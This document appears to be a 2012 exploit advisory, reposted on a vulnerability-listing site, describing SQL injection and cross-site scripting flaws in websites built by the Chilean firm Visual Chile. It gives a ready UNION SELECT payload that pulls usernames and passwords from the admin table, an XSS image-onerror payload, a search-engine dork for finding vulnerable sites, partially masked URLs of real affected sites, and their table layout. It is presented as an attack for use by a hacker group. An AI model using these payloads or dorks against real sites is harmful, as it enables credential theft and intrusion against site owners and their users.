Visual Chile SQL Injection & Cross-Site Scripting Vulnerabilities

2012-10-31 / 2012-11-01
Credit: Ur0b0r0x
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
CWE-79

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [x] Official Website: http://www.1337day.com 0 1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com 1 0 0 1 ============================================ 1 0 I'm Ur0b0r0x Member From Inj3ct0r TEAM 1 1 ============================================ 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1 | | | Visual Chile - SQL Injection / Cross-Site Scripting Vulnerabilities | -------------------------------------------------------------------------- # Ab0ut M3 #################### # Author: Ur0b0r0x # Tiwtte: @Ur0b0r0x # Email: ur0b0r0x_4n1@live.com # InF0 ######################### # Exploit Title: Visual Chile - SQL Injection / Cross-Site Scripting Vulnerabilities # Vendor Name: Visual Chile # Url Vendor: http://www.visualchile.cl/ # Category: WebApps # Type: php # Risk: Critical # Dork: intext:"Visual Chile DiseƱo Web " # 0day exploits : 1337day.com Inj3ct0r Exploit DataBase # Expl0it ################### http://site.com/*.php?id= < Sql Vulnerability Path > http://site.com/*.php?id= < Xss Vulnerability Path > # Sql_Comand #=> -1+union+select+0,concat(id,0x3a,usuario,0x3a,clave)+from+usuarios-- # Xss_Comand #=> "><img src=x onerror=;;alert('1337day') /> # Dem0_Xss_Sql_Vulnerabilities http://www.vidaemXXXsarial.cl/detalle-galeria.php?id=% http://www.patopXXXrparts.com/detalle-producto.php?id=% http://www.abcdeXXXes.cl/noticias.php?id=% http://www.squashcXXle.com/noticias.php?id=% # Same Tables All Sites Vulnerability [o] Tables +--------------------+ - tabla_actividades - tablla_noticias - tabla_publicaciones - tbl_administradores - tbl_documentos - tbl_imagenes - tbl_noticias - tbl_visitas +-------------------- [o] tbl_administradores +--------+ - id - usuario - clave +-------- # Gr3t'x ######################### >> All Member Inj3ct0r Team >> | Mr.Pack | Nick Nitrous | Revolution_Hackers | Dylan Irzi | R00tc0d3r's | SecurityDev | Mafia Dz | Algerian Hacker | >> And All H4x0r5

References:

http://www.1337day.com


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top